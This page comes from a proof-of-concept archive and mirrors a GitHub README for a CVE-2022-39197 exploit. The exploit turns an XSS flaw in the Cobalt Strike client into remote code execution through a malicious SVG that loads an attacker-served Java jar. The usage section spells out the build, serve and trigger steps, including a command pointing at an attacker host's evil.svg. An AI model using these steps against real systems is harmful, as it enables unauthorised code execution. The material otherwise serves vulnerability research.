Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2022-39197 PoC — HelpSystems Cobalt Strike 跨站脚本漏洞

Source
https://github.com/TheCryingGame/CVE-2022-39197-RCE
Associated Vulnerability
Title:HelpSystems Cobalt Strike 跨站脚本漏洞 (CVE-2022-39197)
Description:An XSS (Cross Site Scripting) vulnerability was found in HelpSystems Cobalt Strike through 4.7 that allowed a remote attacker to execute HTML on the Cobalt Strike teamserver. To exploit the vulnerability, one must first inspect a Cobalt Strike payload, and then modify the username field in the payload (or create a new payload with the extracted information and then modify that username field to be malformed).
Description
CVE-2022-39197 RCE POC
Readme
# CVE-2022-39197-RCE

## First
  This project was modified from [@its-arun](https://github.com/its-arun) project https://github.com/its-arun/CVE-2022-39197

  When I tested the script, I found that the frida script could not query the data in the normal order. The method of modifying the frida script to modify the process name.


Thanks to Master [@Kai5174](https://github.com/Kai5174) for his contribution to the utilization method.


### Usage

- **Prepare Payload**

1、Edit command executed with your payload in `EvilJar/src/main/java/Exploit.java`, now it can only play the calculator.

2、Build using jar `mvn clean compile assembly:single`

4、Move `EvilJar-1.0-jar-with-dependencies.jar` from `EvilJar/target/` to `serve/` folder

5、Edit `serve\evil.svg` replace `[attacker]` 

6、Serve using `python3 -m http.server 8080`

7、Generate beacon.exe with C2 version less than or equal to 4.7

8、You need to execute the py script on a Windows to go online, and perform countermeasures when the client accesses the process list and sees the beacon.exe process.


- **Execute Exploit**

```
python3 -m pip install -r requirements.txt
python3 cve-2022-39197_Yyy.py beacon.exe http://192.168.10.10:8080/evil.svg
```

Payload will be triggered as soon as the user scrolls through Process List

### POC

**Windows**
![1.png](./images/1.png)


**Mac**
![2.jpg](./images/2.jpg)


### Reference

[https://mp.weixin.qq.com/s/Eb0pQ-1ebLSKPUFC7zS6dg](https://mp.weixin.qq.com/s/Eb0pQ-1ebLSKPUFC7zS6dg) — There’s a great in depth analysis of this vulnerability
[https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html](https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html)

Modified https://github.com/its-arun/CVE-2022-39197
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →